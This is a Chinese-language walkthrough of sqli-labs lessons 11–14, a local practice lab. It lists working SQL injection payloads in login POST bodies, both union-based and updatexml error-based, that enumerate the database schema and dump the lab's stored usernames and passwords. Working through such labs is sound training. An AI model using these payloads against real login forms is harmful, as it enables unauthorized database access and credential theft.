sqli-11-14关-2020-04-17
十一关
http://127.0.0.1/sqli/Less-11/
看到这个页面,填个admin,admin再说.
什么情况,竟然出现这个结果.那么再乱填一个.
明显不一样了.那么我还是抓包处理一下.
抓到包,我们可以尝试重发测试.
看到数据库报错,第一时间想到这里有漏洞:报错被原样回显,说明提交的参数很可能被直接拼接进了SQL语句.
uname=xxeyuki' order by 2#&passwd=xxxxxxx&submit=Submit #得知有2列数
uname=xxeyuki' union select 1,database()#&passwd=xxxxxxx&submit=Submit #得到数据库security
uname=xxeyuki' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=xxxxxxx&submit=Submit #得到数据表emails,referers,uagents,users
uname=xxeyuki' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=xxxxxxx&submit=Submit #得到数据表users的字段
user_id,first_name,last_name,user,password,avatar,id,username,password,level,id,username,password,id,username,password
uname=xxeyuki' union select 1,group_concat(username,"~",password) from users#&passwd=xxxxxxx&submit=Submit #数据表users的username和password的数据
Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
第十二关
直接说怎么找注入点和闭合点
uname=xxeyuki'&passwd=33yuki&submit=Submit #单引号没有任何反应
uname=xxeyuki"&passwd=33yuki&submit=Submit #有反应了,很明显的数据库报错。
")这闭合好像非常明显
uname=xxeyuki") order by 3#&passwd=33yuki&submit=Submit #3报错,2没有报错 确定列数2
uname=xxeyuki") union select 1,database()#&passwd=33yuki&submit=Submit #得到数据库security
uname=xxeyuki") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=33yuki&submit=Submit #数据表 users
uname=xxeyuki") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=33yuki&submit=Submit #字段username,password
uname=xxeyuki") union select 1,group_concat(username,password) from users#&passwd=33yuki&submit=Submit #用户名和密码数据
十三关
uname=admin'&passwd=admin&submit=Submit #看到弹出下面这个报错,我就大概确定闭合是')
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1
uname=admin') order by 2#&passwd=admin&submit=Submit #确定列数为2
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit #爆数据库
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#&passwd=admin&submit=Submit #爆数据表
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#&passwd=admin&submit=Submit #爆字段,无语只能17个字符
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1))#&passwd=admin&submit=Submit #只能一个个爆了
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit #密码字段
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #用户名
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select username from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #用户名
uname=admin') union select 1,(updatexml(1,concat(0x7e,(select password from users limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #密码
十四关
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1))#&passwd=admin&submit=Submit #爆数据库
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&passwd=admin&submit=Submit #爆数据表
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&passwd=admin&submit=Submit #爆用户名
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&passwd=admin&submit=Submit #爆密码
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit
uname=admin" union select 1,(updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1))#&passwd=admin&submit=Submit